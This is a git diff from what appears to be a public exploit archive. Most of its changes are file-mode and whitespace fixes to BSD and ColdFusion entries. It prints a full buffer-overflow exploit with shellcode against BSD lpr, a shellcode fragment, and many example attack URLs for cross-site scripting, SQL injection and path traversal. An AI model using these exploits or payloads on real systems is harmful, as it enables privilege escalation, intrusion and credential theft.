100644 diff --git a/platforms/bsd/dos/35058.c b/platforms/bsd/dos/35058.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/36799.c b/platforms/bsd/dos/36799.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/38059.c b/platforms/bsd/dos/38059.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/4935.c b/platforms/bsd/dos/4935.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/8163.txt b/platforms/bsd/dos/8163.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/8581.txt b/platforms/bsd/dos/8581.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/dos/869.c b/platforms/bsd/dos/869.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/10255.txt b/platforms/bsd/local/10255.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/1087.c b/platforms/bsd/local/1087.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/118.c b/platforms/bsd/local/118.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/125.c b/platforms/bsd/local/125.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/1311.c b/platforms/bsd/local/1311.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/15206.c b/platforms/bsd/local/15206.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/16951.c b/platforms/bsd/local/16951.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/19411.txt b/platforms/bsd/local/19411.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/19545.c b/platforms/bsd/local/19545.c old mode 100755 new mode 100644 index 6b3581969..e88f24dd9 --- a/platforms/bsd/local/19545.c +++ b/platforms/bsd/local/19545.c @@ -1,48 +1,50 @@ +/* source: http://www.securityfocus.com/bid/707/info Due to insufficient bounds checking on arguments (in this case -C) which are supplied by users, it is possible to overwrite the internal stack space of the lpr program while it is executing. This can allow an intruder to cause lpr to execute arbitrary commands by supplying a carefully designed argument to lpr. These commands will be run with the privileges of the lpr program. When lpr is installed setuid or setgid, it may allow intruders to gain those privileges. +*/ - #include <stdio.h> - #include <stdlib.h> - #include <unistd.h> +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> - #define DEFAULT_OFFSET 50 - #define BUFFER_SIZE 1023 +#define DEFAULT_OFFSET 50 +#define BUFFER_SIZE 1023 - long get_esp(void) - { - __asm__("movl %esp,%eax\n"); - } +long get_esp(void) +{ + __asm__("movl %esp,%eax\n"); +} - void main() - { - char *buff = NULL; - unsigned long *addr_ptr = NULL; - char *ptr = NULL; +void main() + { + char *buff = NULL; + unsigned long *addr_ptr = NULL; + char *ptr = NULL; - char execshell[] = - "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" - "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" - "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" - "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; + char execshell[] = + "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" + "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" + "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" + "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; - int i; + int i; - buff = malloc(4096); - if(!buff) - { - printf("can't allocate memory\n"); - exit(0); - } - ptr = buff; - memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); - ptr += BUFFER_SIZE-strlen(execshell); - for(i=0;i < strlen(execshell);i++) - *(ptr++) = execshell[i]; - addr_ptr = (long *)ptr; - for(i=0;i<2;i++) - *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; - ptr = (char *)addr_ptr; - *ptr = 0; - execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); - } \ No newline at end of file + buff = malloc(4096); + if(!buff) + { + printf("can't allocate memory\n"); + exit(0); + } + ptr = buff; + memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); + ptr += BUFFER_SIZE-strlen(execshell); + for(i=0;i < strlen(execshell);i++) + *(ptr++) = execshell[i]; + addr_ptr = (long *)ptr; + for(i=0;i<2;i++) + *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; + ptr = (char *)addr_ptr; + *ptr = 0; + execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); +} \ No newline at end of file diff --git a/platforms/bsd/local/19726.c b/platforms/bsd/local/19726.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/200.c b/platforms/bsd/local/200.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/20191.c b/platforms/bsd/local/20191.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/202.c b/platforms/bsd/local/202.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/207.c b/platforms/bsd/local/207.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/21407.c b/platforms/bsd/local/21407.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/21881.txt b/platforms/bsd/local/21881.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/22811.c b/platforms/bsd/local/22811.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/23062.c b/platforms/bsd/local/23062.c old mode 100755 new mode 100644 index e8e499e9c..6fc4131d6 --- a/platforms/bsd/local/23062.c +++ b/platforms/bsd/local/23062.c @@ -95,4 +95,4 @@ int main(int argc, char **argv) fflush(pr); pclose(pr); return 0; - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/bsd/local/23063.c b/platforms/bsd/local/23063.c old mode 100755 new mode 100644 index 80af0a93b..3237528a4 --- a/platforms/bsd/local/23063.c +++ b/platforms/bsd/local/23063.c @@ -213,4 +213,4 @@ void banner(char *argv0) if(u_r_script_kiddy) bruteforce(start); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/bsd/local/23655.txt b/platforms/bsd/local/23655.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/24015.c b/platforms/bsd/local/24015.c old mode 100755 new mode 100644 index 28d82675c..e36f6f910 --- a/platforms/bsd/local/24015.c +++ b/platforms/bsd/local/24015.c @@ -229,4 +229,4 @@ fprintf(stderr,"---------------------------------------\n"); if(u_r_script_kiddy) bruteforce(start); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/bsd/local/24113.c b/platforms/bsd/local/24113.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/243.c b/platforms/bsd/local/243.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/286.c b/platforms/bsd/local/286.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/287.c b/platforms/bsd/local/287.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/29.c b/platforms/bsd/local/29.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/30484.c b/platforms/bsd/local/30484.txt old mode 100755 new mode 100644 similarity index 100% rename from platforms/bsd/local/30484.c rename to platforms/bsd/local/30484.txt diff --git a/platforms/bsd/local/3094.c b/platforms/bsd/local/3094.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/33229.c b/platforms/bsd/local/33229.c old mode 100755 new mode 100644 index fa4aae777..6c4a28523 --- a/platforms/bsd/local/33229.c +++ b/platforms/bsd/local/33229.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/36430/info NetBSD is prone to a local privilege-escalation vulnerability. A local attacker may exploit this issue to cause the kernel stack to become desynchronized. This may allow the attacker to gain elevated privileges or may aid in further attacks. +*/ /* ... */ int main(int argc, char **argv) diff --git a/platforms/bsd/local/3578.c b/platforms/bsd/local/3578.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/396.c b/platforms/bsd/local/396.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/40141.c b/platforms/bsd/local/40141.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/local/739.c b/platforms/bsd/local/739.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/remote/1234.c b/platforms/bsd/remote/1234.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/remote/19039.txt b/platforms/bsd/remote/19039.txt old mode 100755 new mode 100644 index 04e808470..b8be9f0ec --- a/platforms/bsd/remote/19039.txt +++ b/platforms/bsd/remote/19039.txt @@ -27,4 +27,4 @@ pushl $3 movl sp, ap chmk $3b -This code executed execve("/bin/sh", 0, 0). \ No newline at end of file +This code executed execve("/bin/sh", 0, 0). \ No newline at end of file diff --git a/platforms/bsd/remote/19520.txt b/platforms/bsd/remote/19520.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd/remote/19924.c b/platforms/bsd/remote/19924.c old mode 100755 new mode 100644 index 0e3cfad1d..4e6fb012f --- a/platforms/bsd/remote/19924.c +++ b/platforms/bsd/remote/19924.c @@ -170,4 +170,4 @@ void shell(int sock) } } } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/bsd/remote/20731.c b/platforms/bsd/remote/20731.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/remote/21440.c b/platforms/bsd/remote/21440.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/remote/228.c b/platforms/bsd/remote/228.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/remote/234.c b/platforms/bsd/remote/234.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/remote/35919.c b/platforms/bsd/remote/35919.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/remote/409.c b/platforms/bsd/remote/409.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/remote/432.c b/platforms/bsd/remote/432.c old mode 100755 new mode 100644 diff --git a/platforms/bsd/shellcode/13242.txt b/platforms/bsd/shellcode/13242.txt old mode 100755 new mode 100644 diff --git a/platforms/bsd_ppc/shellcode/13243.c b/platforms/bsd_ppc/shellcode/13243.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13244.c b/platforms/bsd_x86/shellcode/13244.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13245.c b/platforms/bsd_x86/shellcode/13245.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13246.c b/platforms/bsd_x86/shellcode/13246.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13247.c b/platforms/bsd_x86/shellcode/13247.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13248.c b/platforms/bsd_x86/shellcode/13248.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13249.c b/platforms/bsd_x86/shellcode/13249.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13250.c b/platforms/bsd_x86/shellcode/13250.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13251.c b/platforms/bsd_x86/shellcode/13251.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13252.c b/platforms/bsd_x86/shellcode/13252.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13254.c b/platforms/bsd_x86/shellcode/13254.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13255.c b/platforms/bsd_x86/shellcode/13255.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/13256.c b/platforms/bsd_x86/shellcode/13256.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/14795.c b/platforms/bsd_x86/shellcode/14795.c old mode 100755 new mode 100644 diff --git a/platforms/bsd_x86/shellcode/16026.c b/platforms/bsd_x86/shellcode/16026.c old mode 100755 new mode 100644 diff --git a/platforms/bsdi_x86/shellcode/13257.txt b/platforms/bsdi_x86/shellcode/13257.txt old mode 100755 new mode 100644 diff --git a/platforms/bsdi_x86/shellcode/13258.txt b/platforms/bsdi_x86/shellcode/13258.txt old mode 100755 new mode 100644 diff --git a/platforms/bsdi_x86/shellcode/13260.c b/platforms/bsdi_x86/shellcode/13260.c old mode 100755 new mode 100644 diff --git a/platforms/cfm/dos/28100.txt b/platforms/cfm/dos/28100.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/remote/21548.txt b/platforms/cfm/remote/21548.txt old mode 100755 new mode 100644 index 726e2e996..6642c4f14 --- a/platforms/cfm/remote/21548.txt +++ b/platforms/cfm/remote/21548.txt @@ -4,4 +4,4 @@ ColdFusion MX is prone to cross site scripting attacks. Attacker-supplied script code may be included in a malicious missing template URI generated by the default Missing Template handler of ColdFusion. The attacker-supplied script code will be executed in the browser of a web user who visits this link, in the security context of the host running ColdFusion. -http://CF_MX_SERVER/<script>alert(document.cookie)</script>.cfm \ No newline at end of file +http://CF_MX_SERVER/<script>alert(document.cookie)</script>.cfm \ No newline at end of file diff --git a/platforms/cfm/webapps/15120.txt b/platforms/cfm/webapps/15120.txt old mode 100755 new mode 100644 index e15f26283..5a6ce5e5b --- a/platforms/cfm/webapps/15120.txt +++ b/platforms/cfm/webapps/15120.txt @@ -105,6 +105,4 @@ References * Vendor advisory: http://www.getmura.com/index.cfm/blog/critical-security-patch/ - * CVE item: CVE-2010-3468 - - \ No newline at end of file + * CVE item: CVE-2010-3468 \ No newline at end of file diff --git a/platforms/cfm/webapps/16225.txt b/platforms/cfm/webapps/16225.txt old mode 100755 new mode 100644 index 455899502..1f3e7e8a0 --- a/platforms/cfm/webapps/16225.txt +++ b/platforms/cfm/webapps/16225.txt @@ -6,7 +6,4 @@ Dork : intext:"Powered by Alcassoft SOPHIA" SQL --- -http://site.com/path/dsp_page.cfm?pageid=[SQL] - - - \ No newline at end of file +http://site.com/path/dsp_page.cfm?pageid=[SQL] \ No newline at end of file diff --git a/platforms/cfm/webapps/21493.txt b/platforms/cfm/webapps/21493.txt old mode 100755 new mode 100644 index cce749f03..356e08a86 --- a/platforms/cfm/webapps/21493.txt +++ b/platforms/cfm/webapps/21493.txt @@ -7,4 +7,4 @@ A program included with the CFXImage documentation doesn't properly filter its i http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=../../../../../../../../../../../../../../../../../../boot.ini -This allows the attacker to view the contents of 'c:\boot.ini'. \ No newline at end of file +This allows the attacker to view the contents of 'c:\boot.ini'. \ No newline at end of file diff --git a/platforms/cfm/webapps/22486.txt b/platforms/cfm/webapps/22486.txt old mode 100755 new mode 100644 index 37c3a5f20..528cb06b3 --- a/platforms/cfm/webapps/22486.txt +++ b/platforms/cfm/webapps/22486.txt @@ -11,4 +11,4 @@ http://www.example.com/instaboard/index.cfm?frmid=1&tpcid=1%20SQL http://www.example.com/instaboard/index.cfm?frmid=1%20SQL&tpcid=1 http://www.example.com/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11 http://www.example.com/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL -http://www.example.com/instaboard/index.cfm?catid=1%20SQL \ No newline at end of file +http://www.example.com/instaboard/index.cfm?catid=1%20SQL \ No newline at end of file diff --git a/platforms/cfm/webapps/22544.txt b/platforms/cfm/webapps/22544.txt old mode 100755 new mode 100644 index 98d09a50d..b9d5d319f --- a/platforms/cfm/webapps/22544.txt +++ b/platforms/cfm/webapps/22544.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for Macromedia ColdFusion MX that may reveal t When certain malformed URL requests are received by the server, an error message is returned containing the full path of the ColdFusion installation. -http://host:8500/CFIDE/probe.cfm \ No newline at end of file +http://host:8500/CFIDE/probe.cfm \ No newline at end of file diff --git a/platforms/cfm/webapps/23256.txt b/platforms/cfm/webapps/23256.txt old mode 100755 new mode 100644 index bfa0b3839..fba376e8e --- a/platforms/cfm/webapps/23256.txt +++ b/platforms/cfm/webapps/23256.txt @@ -4,4 +4,4 @@ It has been reported that Macromedia ColdFusion MX may be prone to a cross-site Macromedia ColdFusion MX version 6.0 may be vulnerable to this issue, however other versions may be affected as well. -http://www.example.com/article.cfm?id=1'<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/article.cfm?id=1'<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/cfm/webapps/24081.txt b/platforms/cfm/webapps/24081.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/24680.txt b/platforms/cfm/webapps/24680.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/25982.txt b/platforms/cfm/webapps/25982.txt old mode 100755 new mode 100644 index c6d3e1910..2ee308b7f --- a/platforms/cfm/webapps/25982.txt +++ b/platforms/cfm/webapps/25982.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability affects Simple Message Board. This issue is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/cfm/webapps/25983.txt b/platforms/cfm/webapps/25983.txt old mode 100755 new mode 100644 index 4e4b9912f..0a9d82b60 --- a/platforms/cfm/webapps/25983.txt +++ b/platforms/cfm/webapps/25983.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability affects Simple Message Board. This issue is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/cfm/webapps/25984.txt b/platforms/cfm/webapps/25984.txt old mode 100755 new mode 100644 index 84fcaa836..d9ac00d7a --- a/platforms/cfm/webapps/25984.txt +++ b/platforms/cfm/webapps/25984.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability affects Simple Message Board. This issue is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/cfm/webapps/25985.txt b/platforms/cfm/webapps/25985.txt old mode 100755 new mode 100644 index 0f542325d..84937a26f --- a/platforms/cfm/webapps/25985.txt +++ b/platforms/cfm/webapps/25985.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability affects Simple Message Board. This issue is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/cfm/webapps/26060.txt b/platforms/cfm/webapps/26060.txt old mode 100755 new mode 100644 index e0a45b371..6354cc17c --- a/platforms/cfm/webapps/26060.txt +++ b/platforms/cfm/webapps/26060.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue affects CFBB version 1.1.0; other versions may also be vulnerable. -http://www.example.com/forums/index.cfm?page=XSS \ No newline at end of file +http://www.example.com/forums/index.cfm?page=XSS \ No newline at end of file diff --git a/platforms/cfm/webapps/26065.txt b/platforms/cfm/webapps/26065.txt old mode 100755 new mode 100644 index 57e70b64c..62004c73b --- a/platforms/cfm/webapps/26065.txt +++ b/platforms/cfm/webapps/26065.txt @@ -9,4 +9,4 @@ This issue reportedly affects Fusebox version 4.1.0; other versions may also be This issue is not believed to exist because the product does not ship with layout configuration files; this has not been confirmed by Symantec. http://www.example.com/index.cfm?fuseaction="><script>alert(document.cookie)</script>< -http://www.example.com/index.cfm?fuseaction=fusebox.overview"><script>alert(document.cookie)</script>< \ No newline at end of file +http://www.example.com/index.cfm?fuseaction=fusebox.overview"><script>alert(document.cookie)</script>< \ No newline at end of file diff --git a/platforms/cfm/webapps/26763.txt b/platforms/cfm/webapps/26763.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/26764.txt b/platforms/cfm/webapps/26764.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/26765.txt b/platforms/cfm/webapps/26765.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/26766.txt b/platforms/cfm/webapps/26766.txt old mode 100755 new mode 100644 index ceb576e9c..304349713 --- a/platforms/cfm/webapps/26766.txt +++ b/platforms/cfm/webapps/26766.txt @@ -10,4 +10,4 @@ CF_Nuke 4.6 and prior versions are reported to be vulnerable; other versions may http://www.example.com/index.cfm?sector=../local file -http://www.example.com/index.cfm?sector=quotes&page=../local file \ No newline at end of file +http://www.example.com/index.cfm?sector=quotes&page=../local file \ No newline at end of file diff --git a/platforms/cfm/webapps/26767.txt b/platforms/cfm/webapps/26767.txt old mode 100755 new mode 100644 index 469696a77..16bb3307e --- a/platforms/cfm/webapps/26767.txt +++ b/platforms/cfm/webapps/26767.txt @@ -13,4 +13,4 @@ http://www.example.com/index.cfm?sector=links&page=links&cmd=view&cat= %22%3E%3Cscript%3Ealert('r0t')%3C/script%3E http://www.example.com/index.cfm?sector=news&page=read&newsid= -%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/cfm/webapps/26772.txt b/platforms/cfm/webapps/26772.txt old mode 100755 new mode 100644 index 5eb5f39ad..9b55761e7 --- a/platforms/cfm/webapps/26772.txt +++ b/platforms/cfm/webapps/26772.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Versions 2.0 and prior are vulnerable; other versions may also be affected. -http://www.example.com/book.cfm?StartRow=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +http://www.example.com/book.cfm?StartRow=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/cfm/webapps/26882.txt b/platforms/cfm/webapps/26882.txt old mode 100755 new mode 100644 index 3dda50be3..fd37e6008 --- a/platforms/cfm/webapps/26882.txt +++ b/platforms/cfm/webapps/26882.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue is reported to affect version 5.3; earlier versions may also be vulnerable. -http://www.example.com/search/index.cfm?keywords=[XSS]&x=25&y=9 \ No newline at end of file +http://www.example.com/search/index.cfm?keywords=[XSS]&x=25&y=9 \ No newline at end of file diff --git a/platforms/cfm/webapps/26909.txt b/platforms/cfm/webapps/26909.txt old mode 100755 new mode 100644 index b27531f00..32f3f79d3 --- a/platforms/cfm/webapps/26909.txt +++ b/platforms/cfm/webapps/26909.txt @@ -22,4 +22,4 @@ http://www.example.com/index.cfm?fuseaction=Document.showDocumentSection&sortby= http://www.example.com/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=[XSS] http://www.example.com/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=[XSS] http://www.example.com/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=[XSS] -http://www.example.com/index.cfm?fuseaction=Document.showDocumentSection&sortby=[XSS] \ No newline at end of file +http://www.example.com/index.cfm?fuseaction=Document.showDocumentSection&sortby=[XSS] \ No newline at end of file diff --git a/platforms/cfm/webapps/26910.txt b/platforms/cfm/webapps/26910.txt old mode 100755 new mode 100644 index bfb39aa9e..0be43fa95 --- a/platforms/cfm/webapps/26910.txt +++ b/platforms/cfm/webapps/26910.txt @@ -8,4 +8,4 @@ This issue reportedly affects version 2.0 of E-Publish; other versions may also http://www.example.com/printer_friendly.cfm?id=[SQL] http://www.example.com/show.cfm?id=274&obcatid=10[XSS] -http://www.example.com/show.cfm?id=279&how=5&obcatid=9&shfrm=1&comid=[XSS] \ No newline at end of file +http://www.example.com/show.cfm?id=279&how=5&obcatid=9&shfrm=1&comid=[XSS] \ No newline at end of file diff --git a/platforms/cfm/webapps/26920.txt b/platforms/cfm/webapps/26920.txt old mode 100755 new mode 100644 index 211487826..b00ae7479 --- a/platforms/cfm/webapps/26920.txt +++ b/platforms/cfm/webapps/26920.txt @@ -7,4 +7,4 @@ Successful exploitation of these vulnerabilities could result in a compromise of http://www.example.com/CategoryResults.cfm?div=7&cat=118&cat_parent=107&series=[SQL] http://www.example.com/CategoryResults.cfm?div=7&cat=118&cat_parent=[SQL] http://www.example.com/CategoryResults.cfm?div=7&cat=[SQL] -http://www.example.com/CategoryResults.cfm?div=[SQL] \ No newline at end of file +http://www.example.com/CategoryResults.cfm?div=[SQL] \ No newline at end of file diff --git a/platforms/cfm/webapps/26986.txt b/platforms/cfm/webapps/26986.txt old mode 100755 new mode 100644 index f10193330..1a5e0aa86 --- a/platforms/cfm/webapps/26986.txt +++ b/platforms/cfm/webapps/26986.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th /loader.cfm?url=/[DIRPATH]/[DIRPATH]/email-login-info.cfm&errmsg=No%20user%20account %20was%20found%20for%20that%20email%20address.%20%20Please%20try%20again.&bNewWindo -w=[XSS] \ No newline at end of file +w=[XSS] \ No newline at end of file diff --git a/platforms/cfm/webapps/27455.txt b/platforms/cfm/webapps/27455.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/27456.txt b/platforms/cfm/webapps/27456.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/27457.txt b/platforms/cfm/webapps/27457.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/27489.txt b/platforms/cfm/webapps/27489.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/27490.txt b/platforms/cfm/webapps/27490.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/27491.txt b/platforms/cfm/webapps/27491.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/27493.txt b/platforms/cfm/webapps/27493.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/27853.txt b/platforms/cfm/webapps/27853.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/29334.txt b/platforms/cfm/webapps/29334.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/29335.txt b/platforms/cfm/webapps/29335.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/29567.txt b/platforms/cfm/webapps/29567.txt old mode 100755 new mode 100644 index 87f47cde4..aeb74dceb --- a/platforms/cfm/webapps/29567.txt +++ b/platforms/cfm/webapps/29567.txt @@ -4,4 +4,4 @@ Adobe ColdFusion is prone to a cross-site scripting vulnerability because it fai An attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/&USER_AGENT=%3Cscript%3Ealert(String.fromCharCode(120,115,115))%3C/s> cript%3E&HTTP_REFERER=http://www.google.com/ \ No newline at end of file +http://www.example.com/&USER_AGENT=%3Cscript%3Ealert(String.fromCharCode(120,115,115))%3C/s> cript%3E&HTTP_REFERER=http://www.google.com/ \ No newline at end of file diff --git a/platforms/cfm/webapps/30202.txt b/platforms/cfm/webapps/30202.txt old mode 100755 new mode 100644 index 986463ade..e55f385a7 --- a/platforms/cfm/webapps/30202.txt +++ b/platforms/cfm/webapps/30202.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce NOTE: Specific vulnerable versions were not disclosed. Reports also indicate that this issue has been addressed in the latest version of the application. -http://www.example.com/forum/include/error/autherror.cfm?FTVAR_URLP=x&errorcode=[SQL_INJ] \ No newline at end of file +http://www.example.com/forum/include/error/autherror.cfm?FTVAR_URLP=x&errorcode=[SQL_INJ] \ No newline at end of file diff --git a/platforms/cfm/webapps/30206.txt b/platforms/cfm/webapps/30206.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/30216.txt b/platforms/cfm/webapps/30216.txt old mode 100755 new mode 100644 index c4dc13859..e4c370398 --- a/platforms/cfm/webapps/30216.txt +++ b/platforms/cfm/webapps/30216.txt @@ -8,4 +8,4 @@ http://www.example.com/forum/include/error/autherror.cfm?errorcode=1 &FTVAR_LINKP=[xss] http://www.example.com/blog/forum/include/error/autherror.cfm?errorcode=1 -&FTVAR_URLP=[xss] \ No newline at end of file +&FTVAR_URLP=[xss] \ No newline at end of file diff --git a/platforms/cfm/webapps/33167.txt b/platforms/cfm/webapps/33167.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/33168.txt b/platforms/cfm/webapps/33168.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/33169.txt b/platforms/cfm/webapps/33169.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/33170.txt b/platforms/cfm/webapps/33170.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/33575.txt b/platforms/cfm/webapps/33575.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/33916.txt b/platforms/cfm/webapps/33916.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/33948.txt b/platforms/cfm/webapps/33948.txt old mode 100755 new mode 100644 index 3589b7a16..13327b9cc --- a/platforms/cfm/webapps/33948.txt +++ b/platforms/cfm/webapps/33948.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the 